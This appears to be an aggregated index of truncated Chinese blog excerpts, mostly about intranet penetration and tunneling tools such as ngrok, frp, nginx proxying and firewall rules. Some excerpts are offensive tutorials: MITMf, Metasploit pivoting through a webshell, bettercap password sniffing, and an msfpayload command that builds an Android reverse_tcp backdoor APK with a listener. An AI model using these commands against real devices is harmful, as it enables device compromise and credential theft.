一.功能描述: 客户端通过访问外网服务器上指定端口,间接访问自已本地的内网服务. 二.原理图如下: 三.实现代码如下: server.go代码: package main; import ( "net" "fmt" "flag" "os" ) type MidServer struct { //客户端监听 clientLis *net.TCPListener; //后端服务连接 transferLis *net.TCPList…

对于家中宽带有公网IP的用户,有时我们需要将路由器内部网络的某些web服务通过端口转发暴露到外网(例如NAS远程访问),但HTTP是明文传输,有被监听的风险:如果在NAS上使用自签名证书,再端口转发,会被Chrome浏览器认为是风险连接拒绝访问(笔者使用80.0.3987版本,命令行参数启动.系统添加证书信任法均不能通过):使用某些NAS自带的Let's Encrypt插件申请到的证书,也只能为NAS单独一个服务添加HTTPS.本文将介绍如何在路由器上安装NGINX并部署SSL,反向代理内网中的…

近需要到 zen cart 的官方网站查询一些资料,却发现无法访问!在网上搜索一番以后,原来如此. Zen Cart官网屏蔽中国用户访问的真正原因 作者:[鹏程万里] 日期:2011-03-26 准备在Zen Cart官网(zen-cart.com)上找个插件,突然发现网站打不开了,但通过代理网站可以访问.开始是怀疑是被Z.F的防火墙给屏蔽了,转念一想又不对:Zen Cart只是技术网站,封他没有必要.实在想不通原因,就到Zen Cart官网的论坛中询问一下. 提问:为什么中国用户不能访问zen…

Ngrok为何物 “ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道.ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放.”这是百度百科上给Ngrok给出的定义.说俗点就是内网穿透,将自己电脑上的Web页面或API等穿透内网,发布到网络上.和国内有名的“花生壳”内网版相似. 调试API时,每次修改提交服务器会比较麻烦,而花生壳经常无缘无故丢我POST参数,稳定点的价格还不菲,无奈选择了Ngrok.但现在大陆地区,Ngrok的官方服务在非“科…

相信做Web开发的同学们,经常会遇到需要将本地部署的Web应用能够让公网环境直接访问到的情况,例如微信应用调试.支付宝接口调试等.这个时候,一个叫ngrok的神器可能会帮到你,它提供了一个能够在公网安全访问内网Web主机的工具,能捕获所有HTTP请求的内容,也支持TCP端口映射,支持Linux.Windows.Mac OS X 等平台. 我们现在就来小试下牛刀,感受下 ngrok 的好玩之处. 一.ngrok 下载 到官网下载ngrok小工具:https://ngrok.com/,工具体积很小,…

Start NettyClient /172.20.11.52 connect to the server /172.20.11.52:20881, dubbo version: 2.5.3, current host: 172.20.11.52 [root@application3 conf]# cat /etc/hosts127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4::1 localh…

打开防火墙,高级配置,新建入站规则,选择“端口”,下一步,填写特定本地端口,然后都是点击下一步,命名规则,到此,内网中的其他人可以访问你的程序了…

本地Linux虚拟内网穿透 把服务器文件下载到本地磁盘 https://natapp.cn/ 1.注册账户点击免费隧道  …

Holer exposes local servers behind NATs and firewalls to the public internet over secure tunnels. Support forwarding message based on TCP protocol. Holer是一个免费开源的内网映射工具,它可以将局域网服务器代理到公网的内网映射工具,支持转发基于TCP协议的报文. Holer地址: https://github.com/Wisdom-Projects…

用iptables就可以了 iptables -F iptables -t nat -F iptables -A INPUT -s -d -j ACCEPT iptables -A INPUT -d -j DROP iptables-save 除了192./ 网段之外的都不能访问. 按照这个写就可以了…

声明:本文具有一定攻击性,仅作为技术交流和安全教学之用,不要用在除了搭建环境之外的环境. 0×01 题记 又是一年十月一,想到小伙伴们都纷纷出门旅游,皆有美酒佳人相伴,想到这里,不禁潸然泪下.子曰:"长得丑就要多读书!"于是有了这篇文章. 0×02 简要介绍 这篇文章的主要目的是介绍一下一个最新的中间人攻击测试框架 – MITMf.工具的作者是byt3bl33d3r,是基于代理工具sergio-proxy修改而来.这里是工具的地址: https://github.com/byt3bl3…

单位有3个域名,用量很大,2014年开始本人研究部署了Bind+DLZ +Mysql的三机智能多链路DNS,非常好用,优点是: 1.使用Mysql管理记录,配置.管理.查询方便. 2.自动判断运营商,返回指定IP,实现智能多链路.目前我们单位有电信.移动.教育网专线和固定IP,通过Bind的View,判断请求源IP自动返回对应运营商的服务IP.很好很强大也很实用. 3.根据配置自动为内网分配对应的运营商解析...我单位内网用户较多,有一个不少见的需求,内网部分用户要使用电信专线.部分用户要使用移…

有公网环境的服务器可以直接看 Hyperledger Fabric 1.0 从零开始(二)--环境构建(公网) ,本篇内容与上篇相似,只不过环境搭建需要在内网下,也就是网络被限制的情况下. 1:环境构建与测试 在本文中用到的宿主机环境是Centos ,版本为Centos.x86_647.2,通过Docker 容器来运行Fabric的节点,版本为v1.0.因此,启动Fabric网络中的节点需要先安装Docker.Docker-compose和Go语言环境,然后在网上拉取相关的Docker镜像,再通…

目录 1. 前言 2. 把rpm包下载到本地 3. 配置nginx对外提供服务 4. 配置本地repo文件 5. 生成repodata信息 6. 检查及使用 7. 对管理机器上的仓库进行更新 参考资料 环境:VMware-Workstation-12-Pro,Windows-10,CentOS-7.5,Xshell5 1. 前言 如果我们的yum仓库需要多台机器共同使用,此时把yum仓库做成本地的,然后一台台scp推送过去比较麻烦,此时可以考虑搭建一个基于HTTP协议,供给内网其它机器使用的本地…

0x00 问题描述 在渗透测试时,metasploit往往作为后渗透工具,(因为远程溢出越来越少).我一般都是在获得一个webshell后,来使用metasploit进行信息采集,或者内网扫描等操作.而大多数站点都是内网ip.而本屌丝自己的机器也是内网ip,那么两个内网ip怎么建立连接? 0x01 解决办法 以前总是使用lcx做端口转发连接站点的3389,是否也可以用lcx将metasploit和站点两个内网ip进行连接?发现是可行的.具体操作步骤如下: 网络环境: Metasploit:192…

最近关注GB28181的朋友很多,昨天有位朋友问到GB28181出内网的问题,希望我花5分钟的时间 讲讲如何通过GB28181协议将内网的摄像机视频推送到公网.要说清楚这个问题,5分钟的时间应该不 够,还是写篇文章跟大家分享下. 说这个问题之前,我想先聊聊GB28181协议,首先我们需要了解的是GB28181是应用层协议,而 不是传输层协议.所谓应用层协议说简单点就是发送方跟接收方商议怎么协作:比如第一个信令由谁 发起,视频流的采用什么封装格式,什么时候开始推送视频,什么时候结束推送等等.GB2…

设置openwrt路由器的防火墙_允许从外网访问内网的ipv6服务 转载注明来源: 本文链接 来自osnosn的博客,写于 2019-11-02. 参考文章: IPv6"内网"设备透出到到公网的正确姿势 在路由器iptables中匹配IPv6动态地址 家用宽带的IPv6配置 现在家庭宽带的运营商,都已经提供 ipv6 了. 当你拨号上网后,运营商给你的路由器分配一个 ipv6 的同时,还会给你分配一个 ipv6 的前缀. 这样,你路由器后面的所有设备都会得到一个公网的 ipv6 地址.…

目录 内网服务器离线编译安装mysql5.7并调优 前言 关于MySQL 一.MySQL安装篇 部署环境 前期准备工具 挂载系统ISO镜像,配置yum源 二.MySQL调优篇 1.对MySQL进行安全设置 2.设置MySQL超时时间 3.MySQL配置文件优化参考1(按需配置即可) 4.MySQL配置文件优化参考2(按需配置即可) 内网服务器离线编译安装mysql5.7并调优 前言 ​ 根据安全性和保密性的要求,内网服务器是不能访问网络的,所以只能离线安装软件,安装MySQL的依赖包需要配置yu…

前言 我们经常会有需求,希望能获取的到当前用户的IP地址,而IP又分为公网ip(也称外网)和私网IP(也称内网IP),IP地址是IP协议提供的一种统一的地址格式,每台设备都设定了一个唯一的IP地址”,从而确保了用户在连网的计算机上操作时,能够快速地从互联网中找到自己所需的对象. 外网IP和内网IP的区别 1,外网IP是全球唯一的IP地址,仅分配给某一台网络设备.内网IP是由路由器分配给每一台设备内部使用的IP地址: 2,外网IP任何一台设备都可以ping通.内网IP只有在同一环境的内部设备才能p…

之前尝试过otunnel,也记录过使用方法,见[笔记] 使用otunnel从外网访问内网,但是用了几天发现还是不够稳定. 然后尝试frp,发现性能稳定,够用,将过程及配置分享在这里吧. 需求 内网机器没有公网IP,但是可以访问外网,现在需要从外网访问内网机器. 举例,在家里机器A访问公司内网机器B. 前提 需要一台有公网IP的服务器S做中转,这样就可以打通AB两端了. A <---> S <---> B 环境 家中A机,Win10 服务器S,Ubuntu 16.04 LTS 64…

首先简单介绍一下内网穿透: 内网穿透:通过公网,访问局域网里的IP地址与端口,这需要将局域网里的电脑端口映射到公网的端口上:这就需要用到反向代理,即在公网服务器上必须运行一个服务程序,然后在局域网中需要被访问的电脑上运行一个客户端,这样就可以把本地的端口映射到公网中: frp是开源的内网穿透工具,基于Go语言编写的,GitHub地址: 源码地址:https://github.com/fatedier/frp 编译好的发行版本:https://github.com/fatedier/frp/rel…

原文地址:https://wuter.cn/1756.html/ 一.IPv4地址 IP协议是为计算机网络相互连接进行通信而设计的协议,它是能使连接到网上的所有计算机网络实现相互通信的一套规则. 这里就不详细说IP地址的发展历史.编址方式.分配.管理相关的知识了,因为暂时用不到,只简单聊聊IP地址的分类:共有地址.私有地址. 1.公有地址 这个比较容易理解,公有地址也就是平时所说的公网IP,有了公网IP,才能拥有被外网中其他设备访问的能力. 但是目前运营商是不会给你分配公网IP的,2019年11…

前言 什么是内网穿透? 内网穿透,又叫 NET 穿透,是计算机用语.用通俗的说法就是你家里的个人电脑,可以直接被外网的人访问.例如你在公司,不通过远程工具,直接也可以访问到家里的电脑(本文章特指 web 应用程序). 正常来说我们的个人电脑时无法被别人访问到的(有固定 ip 除外!),而且现在固定 ip 资源稀缺,运营商也不会随便给你分配了,个人申请也挺难. 为什么需要内网穿透? 就我个人而已,需要用到内网穿透的原因: 一是方便访问公司的内网环境,不喜欢使用远程工具,挺麻烦的. 二是方便把个人电…

文章首发:聊聊第一个开源项目 - CProxy 作者:会玩code 初衷 最近在学C++,想写个项目练练手.对网络比较感兴趣,之前使用过ngrok(GO版本的内网穿透项目),看了部分源码,想把自己的一些优化想法用C++实现一下,便有了这个项目. 项目介绍 CProxy是一个反向代理,用户可在自己内网环境中启动一个业务服务,并在同一网络下启动CProxyClient,用于向CProxyServer注册服务.CProxyClient和CProxyServer之间会创建一个隧道,外网可以通过访问CPr…

什么是frp frp是一个使用非常简单的开源内网穿透软件,代码地址:https://github.com/fatedier/frp ,使用条前提你需要有一台公网服务器,大致原理是:公网服务器监听某个端口等待内网服务器连接,内网服务器连接成功后用户访问公网的某一个端口,访问的所有内容都会转发到内网服务器,也就是所有的请求都会经过公网服务器转发一次,还不是真正的完全内网穿透. 准备工作 准备一台公网服务器,内网服务器可以直接用本地电脑模拟: 本地电脑准备一个可访问的 http://127.0.0.1…

1.环境一(系统:windows xp,内网.外网不是同一类地址,内网地址固定): 外网:通过笔记本的无线网卡连接: 内网:通过笔记本的本地连接: 第一步,连接网线,配置本地连接地址,注意IP地址不要与其它在用ip冲突: 下图,本地连接配置10.9.1.189的内网地址. 外网地址,则由笔记本的无线网卡连接到路由器,自动获得的p地址,本机获得的IP地址为192.168.1.115. 现在测试,内网可以ping通其它任意主机,外网也连接,但打开浏览器,不能上网: 如果拔掉网线,外网就可以上网. 第…

说明: 1.适用于内网用户(局域网,校园网,或者公司网等无法更改路由器映射的情况) 2.一共花了8块钱…………心疼.不过如果大家有钱的话,8块钱,少吃一顿麻辣烫就好了~总之,这个适用于测试网站,小访问量的应用,仅供娱乐用.因为要用自己电脑做服务器,对电脑损耗很大,所以正式应用或商业应用时需要去专业提供服务器的公司如阿里云服务. 步骤: 1.下载新花生壳,并申请域名.具体下载方法和安装方法请自行百度.最近花生壳域名注册不是免费的了,不过新用户可以选择免费送一个域名,如下: 用户名为这个:就不暴露自…

安装bettercap 1 2 root@sch01ar:~# apt-get update root@sch01ar:~#  apt-get install bettercap 安装完成后查看一下帮助 root@sch01ar:~# bettercap -h 开启嗅探 root@sch01ar:~# bettercap -I eth0 --proxy -P POST 用同一内网的windows2008机访问一个网站,并模拟登陆 嗅探到密码 参数详情: -I:后面加网卡 --use-mac:使用…

1,内网木马 先生成一个小马 msfpayload -p android/meterpreter/reverse_tcp LHOST=192.168.8.104 LPORT=5555 R > android_backdoor.apk ip填写自己的内网ip ,端口自定 启动  msfconsole 依次输入下面的命令 use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.8.…

Socks5+proxychains做正向代理 1.         应用场景: 有一台能上外网的机子,内网机子都不能连外网,需求是内网机子程序需要访问外网,做正向代理. 2.         软件 Server端:   Client端:       3.SOCKS5 是一个代理协议,它在使用TCP/IP协议通讯的前端机器和服务器机器之间扮演一个中介角色,使得内部网中的前端机器变得能够访问Internet网中的服务器,或者使通讯更加安全.SOCKS5 服务器通过将前端发来的请求转发给真正的目标服…